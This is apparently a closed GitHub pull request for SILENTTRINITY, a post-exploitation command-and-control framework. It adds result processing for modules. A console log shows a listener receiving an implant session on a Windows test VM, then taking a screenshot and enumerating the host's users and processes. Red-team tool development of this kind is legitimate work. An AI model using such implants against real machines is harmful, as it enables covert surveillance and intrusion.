### PR TITLE
Feature: Capturing results

### PR DESCRIPTION
**Pull request by davidtavarez**
```

                                         ........                                   
                                    .':ldxkkkkkxdoc,.                               
                                  .cdOOOOOOOOOOOOOOOxl,.                            
                                .ckOOOOOOOOOOOOOOOOOOOko'                           
                               .dOOOOOOOOOOOOOOOOOOOOOOOx;                          
                              .oOOOOOOOOOOOOOOOOOOOOOOOOOx,                         
                              :OOOOOOOOOOOOOOOOOOOOOOOOOOOo.                        
                             .lOOOOxoccldOOOOOOOxoccldkOOOd'                        
                              cOOkc'.,,..;xOOOkc'.,;..;dOOd.                        
                              ,kOl.'cccl;.;kOOl.'cccl;.;kOc.                        
                              .cOl..:cc:'.:kOOo..:cc:,.:kd.                         
                               .oko,.''.'cxl;cdo,.',.'cxx,                          
                                .oOOxoodkOd;',lOOxoodkOx,                           
                                 .oOxdocc:;;;;;::cloxkx,                            
                                  .'.               .'.                             
                          .......                       .......                     
                   ..;:looddxxkkk;         .''.        .dkkxxdddolc;'.              
                 'cdkOOxc;,,,cdOOo.       'dOk:        :OOxl;,,,:dOOOxl,.           
               .lkOOOOd'.;::;'.lOO:       .cOd.       ,xOx,.,::;'.lOOOOOd,          
              ,xOOOOOOc.;o:;o: ;kkx;       ;oc.      'okOl.,oc;oc.,kOOOOOkc.        
             ,xOOOOOOOd,.,;;,..ox;,l:.              'l;,ox,.,;;;'.lOOOOOOOOc.       
            .oOOOOOOOOOkl;,,;cxOdc:okl.           .:xdc:oOkl;,,;cdOOOOOOOOOk,       
            ,xOOOOOOOOOOOOOOOkdc;;:okOx:.        ,okkdc:;:okOOOOOOOOOOOOOOOOc       
            ,kOOOOOOOOOOOOOOx;.';;'.,dOOd:.    'okOx:..;;'.'oOOOOOOOOOOOOOOOc       
            .dOOOOOOOOOOOOOOc.,oc:o: ;kOkc.    ,xOOl.,oc;o:.,kOOOOOOOOOOOOOk;       
             ;kOOOOOOOOOOOOOo..;cc:'.cOx;       .oOd..;cc:'.cOOOOOOOOOOOOOOl.       
             .:kOOOOOOOOOOOOOd;',,',oko.         .cxd:',,',lkOOOOOOOOOOOOOo.        
               ,dOOOOOOOOOOOOOOkxxkOx;.            'okkxxkOOOOOOOOOOOOOOx:.         
                .;okOOOOOOOOOOOOOkd:.               .,lxOOOOOOOOOOOOOkd:.           
                   .,cldxxkkxdoc;.                     .,cldxxkkxdoc;'.             
                        ......                              ......                  
    

        _____ ______    _______   __________________  _____   ______________  __
       / ___//  _/ /   / ____/ | / /_  __/_  __/ __ \/  _/ | / /  _/_  __/\ \/ /
       \__ \ / // /   / __/ /  |/ / / /   / / / /_/ // //  |/ // /  / /    \  /
      ___/ // // /___/ /___/ /|  / / /   / / / _, _// // /|  // /  / /     / /
     /____/___/_____/_____/_/ |_/ /_/   /_/ /_/ |_/___/_/ |_/___/ /_/     /_/
    

                                    Codename : 尻目
                                   Version  : 0.1.0dev
    
ST ≫ listeners                                                                                                                                                                           
ST (listeners) ≫ use https                                                                                                                                                               
ST (listeners)(https) ≫ set BindIP 10.0.0.5                                                                                                                                              
ST (listeners)(https) ≫ set Port 8990                                                                                                                                                    
ST (listeners)(https) ≫ start                                                                                                                                                            
[+] Listener 'https' started successfully!
ST (listeners)(https) ≫ modules                                                                                                                                                          
Running on https://10.0.0.5:8990 (CTRL + C to quit)
ST (modules) ≫ use boo/screenshot                                                                                                                                                        
[+] New session 9bef3dfa-05ce-4d10-82ba-ee30dd4c512d connected! (10.0.0.5)
ST (modules)(boo/screenshot) ≫ run all                                                                                                                                                   
ST (modules)(boo/screenshot) ≫                                                                                                                                                           
[+] 9bef3dfa-05ce-4d10-82ba-ee30dd4c512d returned job result (id: EnusjXvf)
[+] Screenshot was taken successfully: screenshot_190309_151818.jpg
ST (modules)(boo/screenshot) ≫ use ipy/hostenum                                                                                                                                          
ST (modules)(ipy/hostenum) ≫                                                                                                                                                             
ST (modules)(ipy/hostenum) ≫ run all                                                                                                                                                     
ST (modules)(ipy/hostenum) ≫                                                                                                                                                             
[+] 9bef3dfa-05ce-4d10-82ba-ee30dd4c512d returned job result (id: QCLzMiVv)
﻿********************
 SYSTEM INFORMATION 
********************
Host      : MSEDGEWIN10
OS        : Windows 10 Enterprise Evaluation 10.0.17134.376
64-Bit    : True
Date      : 3/9/2019 3:18:33 PM
Uptime    : 3/7/2019 8:36:03 PM

Username      : MSEDGEWIN10\IEUser
Logon Server  : \\MSEDGEWIN10
...

13920    Taskmgr.exe               MSEDGEWIN10\IEUser                       
13924    Code.exe                  MSEDGEWIN10\IEUser                       C:\Users\IEUser\AppData\Local\Programs\Microsoft VS Code\Code.exe
14176    Code.exe                  MSEDGEWIN10\IEUser                       C:\Users\IEUser\AppData\Local\Programs\Microsoft VS Code\Code.exe
14212    SystemSettings.exe        MSEDGEWIN10\IEUser                       C:\Windows\ImmersiveControlPanel\SystemSettings.exe


ST (modules)(ipy/hostenum) ≫ su boo/msgbox                                                                                                                                               
[-] Unknown command 'su'
ST (modules)(ipy/hostenum) ≫                                                                                                                                                             
ST (modules)(ipy/hostenum) ≫ use ipysysteminfo                                                                                                                                          
ST (modules)(ipy/systeminfo) ≫                                                                                                                                                           
ST (modules)(ipy/systeminfo) ≫ run all                                                                                                                                                   
ST (modules)(ipy/systeminfo) ≫                                                                                                                                                           
[+] 9bef3dfa-05ce-4d10-82ba-ee30dd4c512d returned job result (id: KzimPIXh)
﻿
Host:   MSEDGEWIN10
OS:     Win32NT 10.0.17134.376
64-Bit: True
Domain: MSEDGEWIN10
User:   IEUser
Date:   3/9/2019 3:19:06 PM


ST (modules)(ipy/systeminfo) ≫ use boo/msgbox                                                                                                                                            
ST (modules)(boo/msgbox) ≫                                                                                                                                                               
ST (modules)(boo/msgbox) ≫ run all                                                                                                                                                       
ST (modules)(boo/msgbox) ≫                                                                                                                                                               
[+] 9bef3dfa-05ce-4d10-82ba-ee30dd4c512d returned job result (id: qxJEQaKc)
Popped
ST (modules)(boo/msgbox) ≫                
```

### CODE REVIEW

**Comment by davidtavarez** [comment]
New property add to class `Sessions`:
```python
self.jobs_modules: dict = {}
```
I'm saving the module of the Job when a Job is added:
```python
guid, job = job_tuple
self.add_job_module(job)
```
When the results are received, I'm calling `process` from class `Module`:
```python
self.get_job_module(job_id).process(results['result'])
````
The `Module` class is really simple:
```python
import abc


class Module:
    def __init__(self):
        self.name: str = 'module'
        self.description: str = ''
        self.author: str = ''
        self.options = {}

    @abc.abstractmethod
    def payload(self):
        raise NotImplementedError

    def process(self, result):
        print(result)
```
Now each module should extend from `Module`:
```python
class STModule(Module):
    def __init__(self):
        super().__init__()
...
```
You will need to override the `process` method If you need to do something with the results (example):
```
    def process(self, result):
        b64_string = result.replace("\n", "").replace("\r", "")
        b64_string += "=" * ((4 - len(b64_string) % 4) % 4)
        b64_string = b64_string.encode()

        ba = bytes(b64_string)

        basename = "screenshot"
        suffix = '{}.{}'.format(datetime.datetime.now().strftime("%y%m%d_%H%M%S"), 'jpg')
        filename = "_".join([basename, suffix])

        with open(filename, "wb") as file:
            file.write(base64.decodebytes(ba))

        print_good("Screenshot was taken successfully: {}".format(filename))
```

I'm pleased to hear a better way to currently processing results.

**Comment by davidtavarez** [comment]
Added a module to take screenshots:
screenshot_190309_151818

**Comment by davidtavarez** [comment]
**Extra note**: Using `using` (Boo-lang) withing the module isn't working... I don't know why.

**Comment by byt3bl33d3r** [comment]
I'm closing this since this has been implemented in the `0.2.0.dev` branch

**Pull request closed without merging**
